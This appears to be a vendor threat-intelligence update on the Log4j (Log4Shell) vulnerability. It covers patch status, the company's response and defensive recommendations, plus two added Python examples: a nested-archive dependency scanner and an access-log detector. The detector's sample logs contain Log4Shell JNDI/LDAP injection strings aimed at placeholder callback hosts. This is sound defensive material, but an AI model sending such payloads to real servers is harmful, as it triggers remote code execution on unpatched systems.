zvelo Cyber Threat Intelligence: Log4j Vulnerability Update
Log4j Vulnerability Overview
On December 9, 2021, researchers announced the discovery of a vulnerability with a Common Vulnerability Scoring System (CVSS) score of 10.0 in the open source Apache Log4j software library, which is used in Java-based and Java-dependent web applications. Of greatest concern with Common Vulnerabilities and Exposures (CVE) 2021-44228 is the ability for an attacker to achieve remote code execution (RCE) against internet-facing web servers without the need to authenticate. This vulnerability was weaponized by Malicious Cyber Actors (MCA) within days of its release. As of December 13, 2021, the associated Java Naming and Directory Interface (JNDI) and Lightweight Directory Access Protocol (LDAP) command sequence was found being used by multiple botnets. The exploit, termed “Log4Shell”, continues to be actively exploited in the wild, and affected organizations should take immediate action to update and monitor potentially impacted systems.
For more details on the Log4j threat, see the original post from December 9, 2021.
Key Facts:
- Patches are currently available for CVE 2021-44228 and the related CVE 2021-45046 for Java 7 and Java 8 users that leverage Log4j. These fixes prevent RCE via the Log4Shell exploit.
- The full impact of the vulnerability and exploit is unknown, because tens of thousands of Java artifacts spread across multiple repositories have direct or indirect dependencies on Log4j.
- Cloud Service Providers (CSP) and their associated products are impacted (link to the growing list can be found in the references/resources section).
- The attack signature for Log4Shell is known and does not use encryption. This means that attempts to use Log4Shell against a vulnerable web-server can be detected, alerted, and prevented.
- MCAs are leveraging their existing malicious infrastructure to exploit Log4Shell. As a result, if an MCA attacks a vulnerable web-server with the Log4Shell exploit and takes control of the system, it would not be surprising to see malicious egress traffic to known bad infrastructure.
zveloCTI Actions:
- zvelo assessed our operational systems and patched one impacted asset. Result: Backend systems secured to deliver best-in-class cyber threat intelligence and URL classification to our clients.
- zvelo reviewed our zveloDB SDK code for any related dependencies. No dependencies were discovered. Result: The zveloDB SDK is not vulnerable and customers can continue using this capability with confidence. zvelo recommends all zveloDB SDK clients review their implementation from a cybersecurity perspective regardless.
- Once Log4Shell was picked up by botnets (e.g. Mirai, Muhstik, and others), the zvelo Cybersecurity Team reviewed our Malicious Detailed Detection Feed (MDDF) product for related Indicators of Compromise (IOC). The Team identified 1000s of full-path URLs, base and subdomains, and IP addresses already in MDDF associated with botnets and other MCA activities related to Log4Shell. More Log4Shell IOCs are added to MDDF daily, with some also flowing to zveloDB. Result: zvelo customers were protected prior to exploitation and are receiving regular updates which assure further protection from Log4Shell depending upon product consumption and implementation.
- The zvelo Cybersecurity Team continues to analyze numerous internal and external trusted data sources for additional Log4Shell IOCs. When verified, these IOCs are added to MDDF. Result: zvelo customer protection against Log4Shell exploitation continues to expand.
Technical Recommendations:
- Immediately patch systems known to be running Log4j. Assess all systems for direct and indirect dependencies on Log4j via Java, and patch those systems as well.
- Review internet exposed systems (via a tool such as Shodan) to discover and identify any unknown assets. Scan those systems and patch them immediately.
- Review integrated third-party software for the Log4j vulnerability. Coordinate with those vendors for patching support as required. Coordinate with supporting CSPs and immediately implement any patches provided.
- Implement Intrusion Detection System (IDS), Intrusion Prevention System (IPS), Firewall, and Security Information and Event Management (SIEM) rules to monitor organization traffic (ingress for JNDI/LDAP and egress for connections outside of the norm).
- Log4Shell is being used, and will continue to be used, by a variety of MCAs and botnet operators. It is likely that these groups will leverage Log4Shell as an attack vector for the delivery of ransomware, data stealers, and other malware. Organizations should review groups that may have interest in their activities and implement additional detection and alerting rules beyond CVE 2021-44228.
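The first recommendation above asks for an assessment of direct and indirect Log4j dependencies. The following is an added example, not zvelo code: it walks an archive and any archives nested inside it, looking for the log4j-core class that implements JNDI lookups. The archive names and sample contents are constructed for illustration.

```python
import io
import zipfile

# Class in log4j-core 2.x that implements the JNDI lookup. Its presence shows
# the library is bundled; the version must still be checked against the patch.
MARKER = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear")

def find_log4j(data, path="", depth=0, max_depth=4):
    """Return archive paths (outer!/inner!/...) whose contents include MARKER."""
    hits = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits  # not an archive, or corrupt: nothing to report
    with zf:
        for name in zf.namelist():
            if name == MARKER:
                hits.append(path)
            elif name.lower().endswith(NESTED) and depth < max_depth:
                # Indirect dependency: recurse into the bundled archive.
                hits += find_log4j(zf.read(name), f"{path}!/{name}",
                                   depth + 1, max_depth)
    return hits

def make_zip(entries):
    """Build an in-memory archive from {name: bytes} (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed sample: a WAR that pulls in log4j-core only indirectly, inside
# another library's fat JAR, next to a WAR with no Log4j at all.
CORE_JAR = make_zip({MARKER: b"\xca\xfe\xba\xbe"})
FAT_JAR = make_zip({"com/vendor/Lib.class": b"", "lib/log4j-core.jar": CORE_JAR})
OTHER_JAR = make_zip({"a/B.class": b""})
SAMPLE_WAR = make_zip({"WEB-INF/lib/vendor-lib.jar": FAT_JAR,
                       "WEB-INF/lib/other.jar": OTHER_JAR})
CLEAN_WAR = make_zip({"WEB-INF/lib/other.jar": OTHER_JAR})

if __name__ == "__main__":
    print(find_log4j(SAMPLE_WAR, "app.war"))
```

For a file on disk, pass its bytes and its path as the first two arguments. Copies of the library whose packages were renamed during shading do not carry this class path and need a separate check.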
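The Key Facts note that the Log4Shell attack signature is known and unencrypted, and the recommendations call for ingress rules on JNDI/LDAP and egress monitoring. The following is an added example, not a zvelo rule: it flags JNDI lookup strings in web access logs, including percent-encoded ones, and extracts the callback host so it can be matched against egress traffic. The log lines are constructed, and the schemes other than LDAP are assumptions added for coverage.

```python
import re
from urllib.parse import unquote

# JNDI lookup opener plus a directory scheme. The page names JNDI and LDAP;
# ldaps, rmi and dns are assumptions added here for coverage.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^/}\s:]+)", re.IGNORECASE)

# Constructed access-log lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://cb.example.invalid/a}"',
    '203.0.113.44 - - [13/Dec/2021:10:02:11 +0000] "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.8 - - [13/Dec/2021:10:03:00 +0000] "GET /docs/jndi-ldap-howto HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def decode(field, rounds=3):
    """Percent-decode repeatedly: proxies may log single- or double-encoded values."""
    for _ in range(rounds):
        nxt = unquote(field)
        if nxt == field:
            break
        field = nxt
    return field

def scan_line(line):
    """Return (scheme, callback_host) if the line carries a JNDI lookup, else None."""
    m = JNDI_RE.search(decode(line))
    return (m.group(1).lower(), m.group(2).lower()) if m else None

def scan_log(lines):
    """Return one alert per matching line: line number, source IP, scheme, callback host."""
    alerts = []
    for n, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            alerts.append({"line": n, "src": line.split(" ", 1)[0],
                           "scheme": hit[0], "callback": hit[1]})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The callback hosts this returns are the values to look for in firewall and DNS egress logs, since a vulnerable server that processed the request would have tried to reach them.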
Please reach out to the zvelo Cybersecurity Team if you would like further information on Log4j, Log4Shell, and actions your organization can take to protect itself today.
Additional References and Resources on the Log4j Vulnerability:
- Log4j – https://logging.apache.org/log4j/2.x/
- CVSS – https://www.first.org/cvss/
- CISA Log4j Guidance – https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
- Swiss Computer Emergency Response Team (CERT) Log4j blog – https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
- MITRE ATT&CK Groups – https://attack.mitre.org/groups/
- zvelo Log4j Alert – https://zvelo.com/threat-alert-log4j-used-to-exploit-exposed-systems/